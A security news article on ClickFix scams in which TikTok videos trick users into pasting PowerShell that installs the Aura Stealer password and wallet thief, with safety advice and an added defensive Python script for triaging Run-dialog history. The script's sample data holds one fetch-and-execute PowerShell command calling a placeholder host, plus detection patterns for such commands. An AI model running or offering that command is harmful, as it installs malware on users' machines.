- TikTok videos trick users into executing malicious commands disguised as software activators
- Aura Stealer malware steals passwords, cookies and crypto wallet data from infected systems
- Avoid suspicious links, use official software and keep security tools fully up to date
The dreaded ClickFix malware attacks are now targeting TikTok users, tricking them into installing information stealers and losing sensitive files, account access, and possibly even money.
Security researchers, including Trend Micro, Xavier Mertens, and others, have reported viewing multiple TikTok videos offering instructions on how to “activate” popular software such as Windows, Microsoft 365, Adobe Premiere, and others. In some cases, the videos instruct viewers how to activate product bundles that don’t even exist, such as on Netflix or Spotify.
“Activation” is the usual ClickFix trick: users are told to copy and paste a command into the Windows Run dialog, but the command is actually malicious PowerShell that deploys and executes Aura Stealer.
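Because the pasted command goes through the Windows Run dialog, it is recorded in the user's Run history (the RunMRU registry values), which a responder can triage. The following is an added example, not code from the researchers or from this article; the sample entries, the hostname and the two-trait threshold are constructed assumptions.

```python
import re

# Programs the Run dialog can start that execute script text directly.
LAUNCHERS = re.compile(r"\b(powershell|pwsh|cmd|mshta)(\.exe)?\b", re.I)
# Traits of a pasted one-liner rather than a command a person types by hand.
TRAITS = {
    "hidden window": re.compile(r"-w[a-z]*\s+hidden", re.I),
    "encoded command": re.compile(r"\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote fetch": re.compile(
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|downloadstring)\b", re.I),
    "in-memory execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "URL in command": re.compile(r"https?://", re.I),
}

def parse_run_mru(values):
    """Return Run-dialog commands, most recent first, from RunMRU values."""
    order = values.get("MRUList", "")
    cmds = []
    for key in order:
        cmd = values.get(key)
        if cmd is None:
            continue
        # Windows stores each entry with a trailing "\1" marker; strip it.
        cmds.append(cmd[:-2] if cmd.endswith("\\1") else cmd)
    return cmds

def triage(values, min_traits=2):
    """Flag entries that start a script host and show several paste traits."""
    findings = []
    for cmd in parse_run_mru(values):
        if not LAUNCHERS.search(cmd):
            continue
        hits = [name for name, rx in TRAITS.items() if rx.search(cmd)]
        if len(hits) >= min_traits:  # threshold is an assumption, tune locally
            findings.append((cmd, hits))
    return findings

# Constructed sample of RunMRU values (not taken from a real incident).
SAMPLE = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "cmd /c ipconfig\\1",
    "c": 'powershell -w hidden -c "iex (irm https://activate.example.invalid/run)"\\1',
}

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print("SUSPICIOUS:", cmd, "|", ", ".join(hits))
```

On a Windows host the same dictionary can be filled from `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` with Python's standard `winreg` module.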
How to stay safe
Aura Stealer is an information-stealing malware that captures passwords stored in browsers, authentication cookies, cryptocurrency wallet data, and credentials from other applications. Xavier Mertens added that the ClickFix code also downloads additional malware, the purpose of which is currently unclear.
As a scam technique, ClickFix has been around for decades. It works by tricking people into thinking they have a problem with their computer and then offering a quick and easy solution.
It started with browser pop-ups, in the early 2000s, when the scam revolved around fake virus notifications. In more recent times, ClickFix evolved and now tricks people with fake “locked” documents, exclusive offers, software activators and the like.
To stay safe, be skeptical of random links or buttons in emails or on websites, especially those that ask you for urgent fixes or updates. Always visit official websites and use legitimate software. Also, make sure your browser, operating system, and security software are up to date, and use a trusted ad blocker (if possible).
Finally, be careful when granting permissions to websites or apps: if something seems suspicious or too convenient, close the page and check it first.
Via BleepingComputer